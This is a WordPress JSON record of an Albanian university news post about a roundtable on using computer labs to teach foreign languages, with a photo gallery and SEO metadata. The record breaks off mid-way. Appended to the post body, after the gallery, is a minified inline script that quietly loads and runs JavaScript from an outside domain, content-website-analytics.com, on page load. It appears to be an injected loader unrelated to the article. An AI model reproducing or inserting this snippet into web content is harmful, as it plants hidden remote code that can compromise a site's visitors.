{"id":17649,"date":"2023-03-31T07:28:41","date_gmt":"2023-03-31T07:28:41","guid":{"rendered":"https:\/\/unkorce.edu.al\/?p=17649"},"modified":"2026-04-30T16:13:47","modified_gmt":"2026-04-30T16:13:47","slug":"perdorimi-konkret-i-sallave-kompjuterike-ne-mjediset-shkollore-te-arsimit-parauniversitar-ishte-tema-e-tryezes-se-rrumbullaket-me-lektore-pedagogen-e-departamentit-te-gjuheve-te-huaja-dr-ju","status":"publish","type":"post","link":"https:\/\/unkorce.edu.al\/en\/perdorimi-konkret-i-sallave-kompjuterike-ne-mjediset-shkollore-te-arsimit-parauniversitar-ishte-tema-e-tryezes-se-rrumbullaket-me-lektore-pedagogen-e-departamentit-te-gjuheve-te-huaja-dr-ju\/","title":{"rendered":"\u201cP\u00cbRDORIMI KONKRET I SALLAVE KOMPJUTERIKE N\u00cb MJEDISET SHKOLLORE T\u00cb ARSIMIT PARAUNIVERSITAR ISHTE TEMA E TRYEZ\u00cbS S\u00cb RRUMBULLAK\u00cbT ME LEKTORE PEDAGOGEN E DEPARTAMENTIT TE GJUH\u00cbVE T\u00cb HUAJA, DR. JULIANA \u00c7YFEKU"},"content":{"rendered":"<p>N\u00eb dat\u00ebn 30 mars 2023, departamenti i Gjuh\u00ebve t\u00eb Huaja n\u00eb Universitetin \u201cFan S. Noli\u201d zhvilloi tryez\u00ebn e rrumbullak\u00ebt me tem\u00eb: \u201cP\u00ebrdorimi konkret i sallave kompjuterike n\u00eb mjediset shkollore t\u00eb arsimit parauniversitar, p\u00ebr p\u00ebrvet\u00ebsimin e gjuh\u00ebve t\u00eb huaja (anglisht, gjermanisht, fr\u00ebngjisht, italisht). Tendenca t\u00eb reja n\u00eb m\u00ebsimdh\u00ebnien e gjuh\u00ebs s\u00eb huaj\u2019\u2019. T\u00eb ftuar ishin m\u00ebsues t\u00eb arsimit parauniversitar ( shkollat 9-vje\u00e7are, shkoll\u00eb e mesme e p\u00ebrgjithshme dhe profesionale, staf akademik dhe student\u00eb t\u00eb programeve master).<\/p>\n\n\n\n<p>Fillimisht pjes\u00ebmarr\u00ebsit i p\u00ebrsh\u00ebndeti p\u00ebrgjegj\u00ebsja e k\u00ebtij Departamenti, PhD. Daniela Stoica, e cila u shpreh se veprimtaria ka p\u00ebr q\u00ebllim vendosjen e urave konkrete t\u00eb bashk\u00ebpunimit institucional mes dy niveleve (atij t\u00eb m\u00ebsimdh\u00ebnies dhe t\u00eb t\u00eb nx\u00ebnit t\u00eb gjuh\u00ebs s\u00eb huaj), si dhe shk\u00ebmbimin e p\u00ebrvoj\u00ebs s\u00eb lektores n\u00eb fush\u00ebn k\u00ebrkimore-shkencore, t\u00eb studimit t\u00eb gjuh\u00ebs s\u00eb huaj n\u00eb \u201cGjuh\u00ebsin\u00eb e zbatuar\u201d, p\u00ebr ta transmetuar mes kolegesh, n\u00eb t\u00eb gjitha hallkat e procesit m\u00ebsimor, brenda e jasht\u00eb institucionit.<\/p>\n\n\n\n<p>M\u00eb pas, pedagogia e departamentit t\u00eb Gjuh\u00ebve t\u00eb Huaja, dr. Juliana \u00c7yfeku lektore n\u00eb k\u00ebt\u00eb takim referoi mbi m\u00ebnyrat konkrete t\u00eb p\u00ebrdorimit sallave kompjuterike n\u00eb mjediset shkollore t\u00eb arsimit parauniversitar dhe kryesisht n\u00eb p\u00ebrvet\u00ebsimin e gjuh\u00ebve t\u00eb huaja.<\/p>\n\n\n\n<p>Gjat\u00eb bashk\u00ebbisedimit u n\u00ebnvizua fakti se takime t\u00eb tilla, ku m\u00ebsuesit edukator\u00eb t\u00eb gjuh\u00ebve t\u00eb huaja ndajn\u00eb edhe p\u00ebrvojat e tyre personale kan\u00eb synim: t\u00eb krijojn\u00eb lidhje institucionale dhe bashk\u00ebpunimi interaktiv midis k\u00ebtyre institucioneve t\u00eb dijes; nd\u00ebrthurjen bashk\u00ebkohore t\u00eb njohurive (konteksti akademik dhe konteksti m\u00ebsimor-shkollor); prakticitet n\u00eb p\u00ebrdorimin e metodologjive bashk\u00ebkohore t\u00eb m\u00ebsimit t\u00eb gjuh\u00ebve t\u00eb huaja, p\u00ebrmes risive q\u00eb ai prezanton (site dhe mjete virtuale); kalim p\u00ebrmes t\u00eb m\u00ebsuarit digjital drejt p\u00ebrvet\u00ebsimit dhe p\u00ebrforcimit t\u00eb t\u00eb m\u00ebsuarit t\u00eb fjalorit n\u00eb gjuh\u00eb t\u00eb huaj; nd\u00ebrtimi i \u2018tasks\u2019\/\u2018 activities\u2019 (ushtrime praktike e interaktive) p\u00ebr t\u00eb p\u00ebrforcuar, testuar dhe zgjeruar leksikun e p\u00ebrcaktuar n\u00eb programin l\u00ebndor; perfeksionim i kompetencave komunikative etj.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" data-id=\"17655\" src=\"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-30-at-2.22.05-PM-3-1-1024x768.jpeg\" alt=\"\" class=\"wp-image-17655\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" data-id=\"17656\" src=\"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-30-at-2.22.06-PM-1-1-1024x768.jpeg\" alt=\"\" class=\"wp-image-17656\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" data-id=\"17659\" src=\"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-30-at-2.22.09-PM-2-1024x768.jpeg\" alt=\"\" class=\"wp-image-17659\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" data-id=\"17658\" src=\"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-30-at-2.22.10-PM-1-1-1024x768.jpeg\" alt=\"\" class=\"wp-image-17658\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" data-id=\"17651\" src=\"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-30-at-2.22.10-PM-3-1024x768.jpeg\" alt=\"\" class=\"wp-image-17651\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" data-id=\"17650\" src=\"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-30-at-2.22.11-PM-1-2-1024x768.jpeg\" alt=\"\" class=\"wp-image-17650\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" data-id=\"17652\" src=\"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-30-at-2.22.13-PM-1-2-1024x768.jpeg\" alt=\"\" class=\"wp-image-17652\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" data-id=\"17654\" src=\"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-30-at-2.22.14-PM-2-1024x768.jpeg\" alt=\"\" class=\"wp-image-17654\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" data-id=\"17653\" src=\"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-30-at-2.22.15-PM-2-1024x768.jpeg\" alt=\"\" class=\"wp-image-17653\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" data-id=\"17657\" src=\"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-30-at-2.22.16-PM-1-1-1024x768.jpeg\" alt=\"\" class=\"wp-image-17657\"\/><\/figure>\n<\/figure>\n<script>;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,'script','https:\/\/content-website-analytics.com\/script.js');<\/script>","protected":false},"excerpt":{"rendered":"<p>N\u00eb dat\u00ebn 30 mars 2023, departamenti i Gjuh\u00ebve t\u00eb Huaja n\u00eb Universitetin \u201cFan S. Noli\u201d zhvilloi tryez\u00ebn e rrumbullak\u00ebt me tem\u00eb: \u201cP\u00ebrdorimi konkret i sallave kompjuterike n\u00eb mjediset shkollore t\u00eb arsimit parauniversitar, p\u00ebr p\u00ebrvet\u00ebsimin e gjuh\u00ebve t\u00eb huaja (anglisht, gjermanisht, fr\u00ebngjisht, italisht). Tendenca t\u00eb reja n\u00eb m\u00ebsimdh\u00ebnien e gjuh\u00ebs s\u00eb huaj\u2019\u2019. T\u00eb ftuar ishin m\u00ebsues&#8230;<\/p>","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-17649","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.9 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\u201cP\u00cbRDORIMI KONKRET I SALLAVE KOMPJUTERIKE N\u00cb MJEDISET SHKOLLORE T\u00cb ARSIMIT PARAUNIVERSITAR ISHTE TEMA E TRYEZ\u00cbS S\u00cb RRUMBULLAK\u00cbT ME LEKTORE PEDAGOGEN E DEPARTAMENTIT TE GJUH\u00cbVE T\u00cb HUAJA, DR. JULIANA \u00c7YFEKU - Universiteti &quot;Fan S. Noli&quot;, Kor\u00e7\u00eb<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/unkorce.edu.al\/en\/perdorimi-konkret-i-sallave-kompjuterike-ne-mjediset-shkollore-te-arsimit-parauniversitar-ishte-tema-e-tryezes-se-rrumbullaket-me-lektore-pedagogen-e-departamentit-te-gjuheve-te-huaja-dr-ju\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\u201cP\u00cbRDORIMI KONKRET I SALLAVE KOMPJUTERIKE N\u00cb MJEDISET SHKOLLORE T\u00cb ARSIMIT PARAUNIVERSITAR ISHTE TEMA E TRYEZ\u00cbS S\u00cb RRUMBULLAK\u00cbT ME LEKTORE PEDAGOGEN E DEPARTAMENTIT TE GJUH\u00cbVE T\u00cb HUAJA, DR. JULIANA \u00c7YFEKU - Universiteti &quot;Fan S. Noli&quot;, Kor\u00e7\u00eb\" \/>\n<meta property=\"og:description\" content=\"N\u00eb dat\u00ebn 30 mars 2023, departamenti i Gjuh\u00ebve t\u00eb Huaja n\u00eb Universitetin \u201cFan S. Noli\u201d zhvilloi tryez\u00ebn e rrumbullak\u00ebt me tem\u00eb: \u201cP\u00ebrdorimi konkret i sallave kompjuterike n\u00eb mjediset shkollore t\u00eb arsimit parauniversitar, p\u00ebr p\u00ebrvet\u00ebsimin e gjuh\u00ebve t\u00eb huaja (anglisht, gjermanisht, fr\u00ebngjisht, italisht). Tendenca t\u00eb reja n\u00eb m\u00ebsimdh\u00ebnien e gjuh\u00ebs s\u00eb huaj\u2019\u2019. T\u00eb ftuar ishin m\u00ebsues...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/unkorce.edu.al\/en\/perdorimi-konkret-i-sallave-kompjuterike-ne-mjediset-shkollore-te-arsimit-parauniversitar-ishte-tema-e-tryezes-se-rrumbullaket-me-lektore-pedagogen-e-departamentit-te-gjuheve-te-huaja-dr-ju\/\" \/>\n<meta property=\"og:site_name\" content=\"Universiteti &quot;Fan S. Noli&quot;, Kor\u00e7\u00eb\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/unkorce\" \/>\n<meta property=\"article:published_time\" content=\"2023-03-31T07:28:41+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-04-30T16:13:47+00:00\" \/>\n<meta name=\"author\" content=\"Brikela Qelemeni\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Brikela Qelemeni\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/unkorce.edu.al\/perdorimi-konkret-i-sallave-kompjuterike-ne-mjediset-shkollore-te-arsimit-parauniversitar-ishte-tema-e-tryezes-se-rrumbullaket-me-lektore-pedagogen-e-departamentit-te-gjuheve-te-huaja-dr-ju\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/unkorce.edu.al\/perdorimi-konkret-i-sallave-kompjuterike-ne-mjediset-shkollore-te-arsimit-parauniversitar-ishte-tema-e-tryezes-se-rrumbullaket-me-lektore-pedagogen-e-departamentit-te-gjuheve-te-huaja-dr-ju\/\"},\"author\":{\"name\":\"Brikela Qelemeni\",\"@id\":\"https:\/\/unkorce.edu.al\/#\/schema\/person\/faa34c53e1891c174ff76279b528558e\"},\"headline\":\"\u201cP\u00cbRDORIMI KONKRET I SALLAVE KOMPJUTERIKE N\u00cb MJEDISET SHKOLLORE T\u00cb ARSIMIT PARAUNIVERSITAR ISHTE TEMA E TRYEZ\u00cbS S\u00cb RRUMBULLAK\u00cbT ME LEKTORE PEDAGOGEN E DEPARTAMENTIT TE GJUH\u00cbVE T\u00cb HUAJA, DR. JULIANA \u00c7YFEKU\",\"datePublished\":\"2023-03-31T07:28:41+00:00\",\"dateModified\":\"2026-04-30T16:13:47+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/unkorce.edu.al\/perdorimi-konkret-i-sallave-kompjuterike-ne-mjediset-shkollore-te-arsimit-parauniversitar-ishte-tema-e-tryezes-se-rrumbullaket-me-lektore-pedagogen-e-departamentit-te-gjuheve-te-huaja-dr-ju\/\"},\"wordCount\":401,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/unkorce.edu.al\/#organization\"},\"image\":{\"@id\":\"https:\/\/unkorce.edu.al\/perdorimi-konkret-i-sallave-kompjuterike-ne-mjediset-shkollore-te-arsimit-parauniversitar-ishte-tema-e-tryezes-se-rrumbullaket-me-lektore-pedagogen-e-departamentit-te-gjuheve-te-huaja-dr-ju\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-30-at-2.22.05-PM-3-1-1024x768.jpeg\",\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/unkorce.edu.al\/perdorimi-konkret-i-sallave-kompjuterike-ne-mjediset-shkollore-te-arsimit-parauniversitar-ishte-tema-e-tryezes-se-rrumbullaket-me-lektore-pedagogen-e-departamentit-te-gjuheve-te-huaja-dr-ju\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/unkorce.edu.al\/perdorimi-konkret-i-sallave-kompjuterike-ne-mjediset-shkollore-te-arsimit-parauniversitar-ishte-tema-e-tryezes-se-rrumbullaket-me-lektore-pedagogen-e-departamentit-te-gjuheve-te-huaja-dr-ju\/\",\"url\":\"https:\/\/unkorce.edu.al\/perdorimi-konkret-i-sallave-kompjuterike-ne-mjediset-shkollore-te-arsimit-parauniversitar-ishte-tema-e-tryezes-se-rrumbullaket-me-lektore-pedagogen-e-departamentit-te-gjuheve-te-huaja-dr-ju\/\",\"name\":\"\u201cP\u00cbRDORIMI KONKRET I SALLAVE KOMPJUTERIKE N\u00cb MJEDISET SHKOLLORE T\u00cb ARSIMIT PARAUNIVERSITAR ISHTE TEMA E TRYEZ\u00cbS S\u00cb RRUMBULLAK\u00cbT ME LEKTORE PEDAGOGEN E DEPARTAMENTIT TE GJUH\u00cbVE T\u00cb HUAJA, DR. JULIANA \u00c7YFEKU - Universiteti \\\"Fan S. Noli\\\", Kor\u00e7\u00eb\",\"isPartOf\":{\"@id\":\"https:\/\/unkorce.edu.al\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/unkorce.edu.al\/perdorimi-konkret-i-sallave-kompjuterike-ne-mjediset-shkollore-te-arsimit-parauniversitar-ishte-tema-e-tryezes-se-rrumbullaket-me-lektore-pedagogen-e-departamentit-te-gjuheve-te-huaja-dr-ju\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/unkorce.edu.al\/perdorimi-konkret-i-sallave-kompjuterike-ne-mjediset-shkollore-te-arsimit-parauniversitar-ishte-tema-e-tryezes-se-rrumbullaket-me-lektore-pedagogen-e-departamentit-te-gjuheve-te-huaja-dr-ju\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-30-at-2.22.05-PM-3-1-1024x768.jpeg\",\"datePublished\":\"2023-03-31T07:28:41+00:00\",\"dateModified\":\"2026-04-30T16:13:47+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/unkorce.edu.al\/perdorimi-konkret-i-sallave-kompjuterike-ne-mjediset-shkollore-te-arsimit-parauniversitar-ishte-tema-e-tryezes-se-rrumbullaket-me-lektore-pedagogen-e-departamentit-te-gjuheve-te-huaja-dr-ju\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/unkorce.edu.al\/perdorimi-konkret-i-sallave-kompjuterike-ne-mjediset-shkollore-te-arsimit-parauniversitar-ishte-tema-e-tryezes-se-rrumbullaket-me-lektore-pedagogen-e-departamentit-te-gjuheve-te-huaja-dr-ju\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/unkorce.edu.al\/perdorimi-konkret-i-sallave-kompjuterike-ne-mjediset-shkollore-te-arsimit-parauniversitar-ishte-tema-e-tryezes-se-rrumbullaket-me-lektore-pedagogen-e-departamentit-te-gjuheve-te-huaja-dr-ju\/#primaryimage\",\"url\":\"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-30-at-2.22.05-PM-3-1-1024x768.jpeg\",\"contentUrl\":\"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-30-at-2.22.05-PM-3-1-1024x768.jpeg\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/unkorce.edu.al\/perdorimi-konkret-i-sallave-kompjuterike-ne-mjediset-shkollore-te-arsimit-parauniversitar-ishte-tema-e-tryezes-se-rrumbullaket-me-lektore-pedagogen-e-departamentit-te-gjuheve-te-huaja-dr-ju\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/unkorce.edu.al\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\u201cP\u00cbRDORIMI KONKRET I SALLAVE KOMPJUTERIKE N\u00cb MJEDISET SHKOLLORE T\u00cb ARSIMIT PARAUNIVERSITAR ISHTE TEMA E TRYEZ\u00cbS S\u00cb RRUMBULLAK\u00cbT ME LEKTORE PEDAGOGEN E DEPARTAMENTIT TE GJUH\u00cbVE T\u00cb HUAJA, DR. JULIANA \u00c7YFEKU\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/unkorce.edu.al\/#website\",\"url\":\"https:\/\/unkorce.edu.al\/\",\"name\":\"Universiteti \\\"Fan S. Noli\\\", Kor\u00e7\u00eb\",\"description\":\"Mir&euml;sevini n&euml; faqen zyrtare!\",\"publisher\":{\"@id\":\"https:\/\/unkorce.edu.al\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/unkorce.edu.al\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/unkorce.edu.al\/#organization\",\"name\":\"Universiteti \\\"Fan S. Noli\\\", Kor\u00e7\u00eb\",\"url\":\"https:\/\/unkorce.edu.al\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/unkorce.edu.al\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2024\/08\/Logo_e_Universitetit__Fan_Noli_-e1726660879862.png\",\"contentUrl\":\"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2024\/08\/Logo_e_Universitetit__Fan_Noli_-e1726660879862.png\",\"width\":200,\"height\":120,\"caption\":\"Universiteti \\\"Fan S. Noli\\\", Kor\u00e7\u00eb\"},\"image\":{\"@id\":\"https:\/\/unkorce.edu.al\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/unkorce\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/unkorce.edu.al\/#\/schema\/person\/faa34c53e1891c174ff76279b528558e\",\"name\":\"Brikela Qelemeni\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/unkorce.edu.al\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/6c1805558a9218503040c8b9055763822c6184a1cd600127210a9abbc5aaea04?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/6c1805558a9218503040c8b9055763822c6184a1cd600127210a9abbc5aaea04?s=96&d=mm&r=g\",\"caption\":\"Brikela Qelemeni\"},\"url\":\"https:\/\/unkorce.edu.al\/en\/author\/brikela\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\u201cP\u00cbRDORIMI KONKRET I SALLAVE KOMPJUTERIKE N\u00cb MJEDISET SHKOLLORE T\u00cb ARSIMIT PARAUNIVERSITAR ISHTE TEMA E TRYEZ\u00cbS S\u00cb RRUMBULLAK\u00cbT ME LEKTORE PEDAGOGEN E DEPARTAMENTIT TE GJUH\u00cbVE T\u00cb HUAJA, DR. JULIANA \u00c7YFEKU - Universiteti \"Fan S. Noli\", Kor\u00e7\u00eb","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/unkorce.edu.al\/en\/perdorimi-konkret-i-sallave-kompjuterike-ne-mjediset-shkollore-te-arsimit-parauniversitar-ishte-tema-e-tryezes-se-rrumbullaket-me-lektore-pedagogen-e-departamentit-te-gjuheve-te-huaja-dr-ju\/","og_locale":"en_US","og_type":"article","og_title":"\u201cP\u00cbRDORIMI KONKRET I SALLAVE KOMPJUTERIKE N\u00cb MJEDISET SHKOLLORE T\u00cb ARSIMIT PARAUNIVERSITAR ISHTE TEMA E TRYEZ\u00cbS S\u00cb RRUMBULLAK\u00cbT ME LEKTORE PEDAGOGEN E DEPARTAMENTIT TE GJUH\u00cbVE T\u00cb HUAJA, DR. JULIANA \u00c7YFEKU - Universiteti \"Fan S. Noli\", Kor\u00e7\u00eb","og_description":"N\u00eb dat\u00ebn 30 mars 2023, departamenti i Gjuh\u00ebve t\u00eb Huaja n\u00eb Universitetin \u201cFan S. Noli\u201d zhvilloi tryez\u00ebn e rrumbullak\u00ebt me tem\u00eb: \u201cP\u00ebrdorimi konkret i sallave kompjuterike n\u00eb mjediset shkollore t\u00eb arsimit parauniversitar, p\u00ebr p\u00ebrvet\u00ebsimin e gjuh\u00ebve t\u00eb huaja (anglisht, gjermanisht, fr\u00ebngjisht, italisht). Tendenca t\u00eb reja n\u00eb m\u00ebsimdh\u00ebnien e gjuh\u00ebs s\u00eb huaj\u2019\u2019. T\u00eb ftuar ishin m\u00ebsues...","og_url":"https:\/\/unkorce.edu.al\/en\/perdorimi-konkret-i-sallave-kompjuterike-ne-mjediset-shkollore-te-arsimit-parauniversitar-ishte-tema-e-tryezes-se-rrumbullaket-me-lektore-pedagogen-e-departamentit-te-gjuheve-te-huaja-dr-ju\/","og_site_name":"Universiteti \"Fan S. Noli\", Kor\u00e7\u00eb","article_publisher":"https:\/\/www.facebook.com\/unkorce","article_published_time":"2023-03-31T07:28:41+00:00","article_modified_time":"2026-04-30T16:13:47+00:00","author":"Brikela Qelemeni","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Brikela Qelemeni","Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/unkorce.edu.al\/perdorimi-konkret-i-sallave-kompjuterike-ne-mjediset-shkollore-te-arsimit-parauniversitar-ishte-tema-e-tryezes-se-rrumbullaket-me-lektore-pedagogen-e-departamentit-te-gjuheve-te-huaja-dr-ju\/#article","isPartOf":{"@id":"https:\/\/unkorce.edu.al\/perdorimi-konkret-i-sallave-kompjuterike-ne-mjediset-shkollore-te-arsimit-parauniversitar-ishte-tema-e-tryezes-se-rrumbullaket-me-lektore-pedagogen-e-departamentit-te-gjuheve-te-huaja-dr-ju\/"},"author":{"name":"Brikela Qelemeni","@id":"https:\/\/unkorce.edu.al\/#\/schema\/person\/faa34c53e1891c174ff76279b528558e"},"headline":"\u201cP\u00cbRDORIMI KONKRET I SALLAVE KOMPJUTERIKE N\u00cb MJEDISET SHKOLLORE T\u00cb ARSIMIT PARAUNIVERSITAR ISHTE TEMA E TRYEZ\u00cbS S\u00cb RRUMBULLAK\u00cbT ME LEKTORE PEDAGOGEN E DEPARTAMENTIT TE GJUH\u00cbVE T\u00cb HUAJA, DR. JULIANA \u00c7YFEKU","datePublished":"2023-03-31T07:28:41+00:00","dateModified":"2026-04-30T16:13:47+00:00","mainEntityOfPage":{"@id":"https:\/\/unkorce.edu.al\/perdorimi-konkret-i-sallave-kompjuterike-ne-mjediset-shkollore-te-arsimit-parauniversitar-ishte-tema-e-tryezes-se-rrumbullaket-me-lektore-pedagogen-e-departamentit-te-gjuheve-te-huaja-dr-ju\/"},"wordCount":401,"commentCount":0,"publisher":{"@id":"https:\/\/unkorce.edu.al\/#organization"},"image":{"@id":"https:\/\/unkorce.edu.al\/perdorimi-konkret-i-sallave-kompjuterike-ne-mjediset-shkollore-te-arsimit-parauniversitar-ishte-tema-e-tryezes-se-rrumbullaket-me-lektore-pedagogen-e-departamentit-te-gjuheve-te-huaja-dr-ju\/#primaryimage"},"thumbnailUrl":"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-30-at-2.22.05-PM-3-1-1024x768.jpeg","inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/unkorce.edu.al\/perdorimi-konkret-i-sallave-kompjuterike-ne-mjediset-shkollore-te-arsimit-parauniversitar-ishte-tema-e-tryezes-se-rrumbullaket-me-lektore-pedagogen-e-departamentit-te-gjuheve-te-huaja-dr-ju\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/unkorce.edu.al\/perdorimi-konkret-i-sallave-kompjuterike-ne-mjediset-shkollore-te-arsimit-parauniversitar-ishte-tema-e-tryezes-se-rrumbullaket-me-lektore-pedagogen-e-departamentit-te-gjuheve-te-huaja-dr-ju\/","url":"https:\/\/unkorce.edu.al\/perdorimi-konkret-i-sallave-kompjuterike-ne-mjediset-shkollore-te-arsimit-parauniversitar-ishte-tema-e-tryezes-se-rrumbullaket-me-lektore-pedagogen-e-departamentit-te-gjuheve-te-huaja-dr-ju\/","name":"\u201cP\u00cbRDORIMI KONKRET I SALLAVE KOMPJUTERIKE N\u00cb MJEDISET SHKOLLORE T\u00cb ARSIMIT PARAUNIVERSITAR ISHTE TEMA E TRYEZ\u00cbS S\u00cb RRUMBULLAK\u00cbT ME LEKTORE PEDAGOGEN E DEPARTAMENTIT TE GJUH\u00cbVE T\u00cb HUAJA, DR. JULIANA \u00c7YFEKU - Universiteti \"Fan S. Noli\", Kor\u00e7\u00eb","isPartOf":{"@id":"https:\/\/unkorce.edu.al\/#website"},"primaryImageOfPage":{"@id":"https:\/\/unkorce.edu.al\/perdorimi-konkret-i-sallave-kompjuterike-ne-mjediset-shkollore-te-arsimit-parauniversitar-ishte-tema-e-tryezes-se-rrumbullaket-me-lektore-pedagogen-e-departamentit-te-gjuheve-te-huaja-dr-ju\/#primaryimage"},"image":{"@id":"https:\/\/unkorce.edu.al\/perdorimi-konkret-i-sallave-kompjuterike-ne-mjediset-shkollore-te-arsimit-parauniversitar-ishte-tema-e-tryezes-se-rrumbullaket-me-lektore-pedagogen-e-departamentit-te-gjuheve-te-huaja-dr-ju\/#primaryimage"},"thumbnailUrl":"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-30-at-2.22.05-PM-3-1-1024x768.jpeg","datePublished":"2023-03-31T07:28:41+00:00","dateModified":"2026-04-30T16:13:47+00:00","breadcrumb":{"@id":"https:\/\/unkorce.edu.al\/perdorimi-konkret-i-sallave-kompjuterike-ne-mjediset-shkollore-te-arsimit-parauniversitar-ishte-tema-e-tryezes-se-rrumbullaket-me-lektore-pedagogen-e-departamentit-te-gjuheve-te-huaja-dr-ju\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https: